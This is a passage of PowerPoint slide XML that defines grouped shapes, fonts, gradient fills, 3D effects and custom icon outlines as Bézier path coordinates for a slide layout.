                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
